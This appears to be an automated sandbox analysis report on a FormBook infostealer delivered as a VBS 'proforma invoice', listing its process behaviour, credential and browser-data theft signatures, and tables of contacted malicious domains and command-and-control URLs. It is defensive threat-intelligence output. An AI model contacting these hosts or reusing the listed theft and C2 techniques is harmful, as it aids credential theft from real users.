Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680487 Sample: Unclear Proforma Invoice.vbs Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 55 xc8b49c6mnmdts.xyz 2->55 57 www.xc8b49c6mnmdts.xyz 2->57 59 35 other IPs or domains 2->59 75 Snort IDS alert for network traffic 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 Antivirus detection for URL or domain 2->79 81 6 other signatures 2->81 11 wscript.exe 1 1 2->11         started        signatures3 process4 signatures5 85 Wscript starts Powershell (via cmd or directly) 11->85 87 Very long command line found 11->87 89 Encrypted powershell cmdline option found 11->89 14 powershell.exe 27 11->14         started        process6 signatures7 101 Tries to detect Any.run 14->101 17 ielowutil.exe 6 14->17         started        21 csc.exe 3 14->21         started        24 conhost.exe 14->24         started        26 11 other processes 14->26 process8 dnsIp9 53 101.99.94.169, 49750, 80 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 17->53 67 Modifies the context of a thread in another process (thread injection) 17->67 69 Tries to detect Any.run 17->69 71 Maps a DLL or memory area into another process 17->71 73 2 other signatures 17->73 28 rundll32.exe 1 12 17->28         started        31 explorer.exe 3 1 17->31 injected 51 C:\Users\user\AppData\Local\...\tmhd51lu.dll, PE32 21->51 dropped 34 cvtres.exe 1 21->34         started        file10 signatures11 process12 dnsIp13 91 Tries to steal Mail credentials (via file / registry access) 28->91 93 Tries to harvest and steal browser information (history, passwords, etc) 28->93 95 Writes to foreign memory regions 28->95 99 3 other signatures 28->99 36 cmd.exe 2 28->36         started        39 cmd.exe 1 28->39         started        41 firefox.exe 28->41         started        61 www.muziclips.com 154.210.161.216, 49758, 49759, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 31->61 63 www.blueonb.com 185.27.134.153, 49822, 80 WILDCARD-ASWildcardUKLimitedGB United Kingdom 31->63 65 19 other IPs or domains 31->65 97 System process connects to network (likely due to code injection or exploit) 31->97 43 ielowutil.exe 31->43         started        45 ielowutil.exe 31->45         started        signatures14 process15 signatures16 83 Tries to harvest and steal browser information (history, passwords, etc) 36->83 47 conhost.exe 36->47         started        49 conhost.exe 39->49         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.150.61.226
 ghanesa.xyz unknown
45325 PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID true
101.99.94.169
 unknown Malaysia
45839 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY false
66.29.155.228
 www.linuxizes.com United States
19538 ADVANTAGECOMUS true
185.27.134.153
 www.blueonb.com United Kingdom
34119 WILDCARD-ASWildcardUKLimitedGB true
145.14.153.89
 hikingtaibah.com Netherlands
204915 AWEXUS true
104.21.51.250
 www.147bronzeway.com United States
13335 CLOUDFLARENETUS true
142.250.185.179
 unknown United States
15169 GOOGLEUS false
154.210.161.216
 www.muziclips.com Seychelles
136800 XIAOZHIYUN1-AS-APICIDCNETWORKUS true
89.46.108.25
 www.ap-render.com Italy
31034 ARUBA-ASNIT true
216.18.208.202
 xc8b49c6mnmdts.xyz United States
18450 WEBNXUS true
81.95.96.29
 www.worldbrands.wine Czech Republic
25234 GLOBE-AShttpwwwactive24czCZ true
154.23.227.120
 www.mojawapo.com United States
174 COGENT-174US true
217.160.0.178
 www.maximilianvonah.com Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
130.211.17.207
 www.ymsb.info United States
15169 GOOGLEUS false
154.80.183.133
 www.wwwf2dni.com Seychelles
134548 DXTL-HKDXTLTseungKwanOServiceHK true
188.114.96.3
 www.receiveprim.online European Union
13335 CLOUDFLARENETUS true
217.21.87.131
 itsfindia.online United Kingdom
12491 IPPLANET-ASIL true
154.95.160.71
 www.emitacademy.com Seychelles
134548 DXTL-HKDXTLTseungKwanOServiceHK true
199.15.163.148
 td-balancer-199-15-163-148.wixdns.net United States
14238 INNOVATIVE-NETWORKSUS true
142.251.39.115
 ghs.googlehosted.com United States
15169 GOOGLEUS false
13.248.216.40
 www.coolarts.xyz United States
16509 AMAZON-02US true
104.21.39.116
 www.secureartist.com United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
www.mojawapo.com 154.23.227.120 true
www.coolarts.xyz 13.248.216.40 true
pltraffic39.com 72.52.179.174 true
www.emitacademy.com 154.95.160.71 true
www.muziclips.com 154.210.161.216 true
www.147bronzeway.com 104.21.51.250 true
hikingtaibah.com 145.14.153.89 true
www.linuxizes.com 66.29.155.228 true
www.receiveprim.online 188.114.96.3 true
www.worldbrands.wine 81.95.96.29 true
www.blueonb.com 185.27.134.153 true
xc8b49c6mnmdts.xyz 216.18.208.202 true
www.ymsb.info 130.211.17.207 true
www.maximilianvonah.com 217.160.0.178 true
ghanesa.xyz 103.150.61.226 true
www.ap-render.com 89.46.108.25 true
www.secureartist.com 104.21.39.116 true
ghs.googlehosted.com 142.251.39.115 true
itsfindia.online 217.21.87.131 true
www.wwwf2dni.com 154.80.183.133 true
td-balancer-199-15-163-148.wixdns.net 199.15.163.148 true
www.itsfindia.online unknown unknown
www.5111.site unknown unknown
www.ghanesa.xyz unknown unknown
www.vtubber.com unknown unknown
www.laforet.info unknown unknown
www.edico-al.com unknown unknown
www.et-secure.info unknown unknown
www.hikingtaibah.com unknown unknown
www.svgjp.com unknown unknown
www.productislandsize.xyz unknown unknown
www.programmedsolution.com unknown unknown
www.aia-art.com unknown unknown
www.xc8b49c6mnmdts.xyz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.mojawapo.com/tuid/?m4bd=WEOQpGNSR38PhgWGQI/4C8NMlFMwGI3qKGQVHk5AxuPmXhsKWgjXW9kcijjoxdm/j8Qu&APPTx=9r9PSR true
  • Avira URL Cloud: safe
 unknown
http://www.coolarts.xyz/tuid/ true
  • Avira URL Cloud: safe
 unknown
http://www.worldbrands.wine/tuid/ true
  • Avira URL Cloud: safe
 unknown
http://www.receiveprim.online/tuid/?m4bd=5V7M8j5VuGkiy9NL3tIypAJy22VFPCeBH5Oh5nibDDbINvkaWpZ6bb8s5rlg19isjBzt&M8s=w86DJpgx5FYlUfRP true
  • Avira URL Cloud: safe
 unknown
http://www.emitacademy.com/tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=83varyKolJl8CknPQYlgcSGzNVcyrkZOB+D5ZpiMClZzhWRqo67UpTDjwxWvk8XKYz02 true
  • Avira URL Cloud: safe
 unknown
http://www.vtubber.com/tuid/?m4bd=vE0t2WxjBi8H4KsoCXQPFaaEcnaL0cW4rsHN0mKSQSi6rgkDy1GsjEniIX065GWycDne&UlCp=CJEhZPH false
  • Avira URL Cloud: safe
 unknown
http://www.ymsb.info/tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=x1lqSWX2LKO1JKV9bkchYXFCTPqYoW8UylSztnXFuZ2/7+2KqJfWLK3RcwQMnMv5S2vv false
  • Avira URL Cloud: safe
 unknown
http://www.ap-render.com/tuid/ true
  • Avira URL Cloud: safe
 unknown
http://www.secureartist.com/tuid/ true
  • Avira URL Cloud: safe
 unknown
http://www.svgjp.com/tuid/?m4bd=p0pyYx380zTi+CiqScB4rLgyoRdRZyFFdRM5Rh8HyCuUL1S9LlJi1JnCbSa7CQi/RAeh&8pB=3fY8ljB8rp-H true
  • Avira URL Cloud: safe
 unknown
http://www.ghanesa.xyz/tuid/?m4bd=cJ4k7DdOtYQngKRIFYz9xfmhcqtIvpGa85+jixf523tlwbXsspzXRN02o1TtG1NqJ3tW&APPTx=9r9PSR true
  • Avira URL Cloud: safe
 unknown
http://www.svgjp.com/tuid/ true
  • Avira URL Cloud: safe
 unknown
http://www.ghanesa.xyz/tuid/ true
  • Avira URL Cloud: safe
 unknown
http://www.secureartist.com/tuid/?m4bd=LeABM0dRx+cjh3zMeGVoLpl9dcpUDuhE6Ym2dCR4YXuE8jour2rN+gEOINsGd1piKr34&M8s=w86DJpgx5FYlUfRP true
  • Avira URL Cloud: safe
 unknown
http://www.muziclips.com/tuid/ true
  • Avira URL Cloud: safe
 unknown
http://www.coolarts.xyz/tuid/?m4bd=9gXeVPWqRuIX9bIiSDPSAo7Wpwb+1c/G4dykJbOMN5RD0q8y2Pxv3NPChbg6lQ1LsmOi&M8s=w86DJpgx5FYlUfRP true
  • Avira URL Cloud: safe
 unknown
http://www.receiveprim.online/tuid/ true
  • Avira URL Cloud: safe
 unknown
http://www.wwwf2dni.com/tuid/?m4bd=HIOGqwzZ3Isl7OEwvKn7zxoCIrzNSH0uht2lzyEyFHfgP4651xyJdMCZXys0BRyGrE8f&8pB=3fY8ljB8rp-H true
  • Avira URL Cloud: safe
 unknown
http://www.programmedsolution.com/tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&APPTx=9r9PSR false
  • Avira URL Cloud: safe
 unknown
http://www.linuxizes.com/tuid/ true
  • Avira URL Cloud: safe
 unknown
http://www.xc8b49c6mnmdts.xyz/tuid/?m4bd=vocXnNkofrtqV2skOi0toh6MZkzBPgY3NaQb1h7517U8PmTkl0G2bMX+HFjiIYqpZAQ5&APPTx=9r9PSR true
  • Avira URL Cloud: safe
 unknown
http://www.programmedsolution.com/tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&M8s=w86DJpgx5FYlUfRP false
  • Avira URL Cloud: safe
 unknown
http://www.itsfindia.online/tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=mghAatraeoVXXTpIg6GKnKl23LbAAQF/82d90oG2Rt9sZLGICR2WykimnZjjCp2p0vtb true
  • Avira URL Cloud: safe
 unknown
http://www.ghanesa.xyz/tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=cJ4k7DdOtYQngKRIFYz9xfmhcqtIvpGa85+jixf523tlwbXsspzXRN02o1TtG1NqJ3tW true
  • Avira URL Cloud: safe
 unknown
http://www.ghanesa.xyz/tuid/?m4bd=cJ4k7DdOtYQngKRIFYz9xfmhcqtIvpGa85+jixf523tlwbXsspzXRN02o1TtG1NqJ3tW&8pB=3fY8ljB8rp-H true
  • Avira URL Cloud: safe
 unknown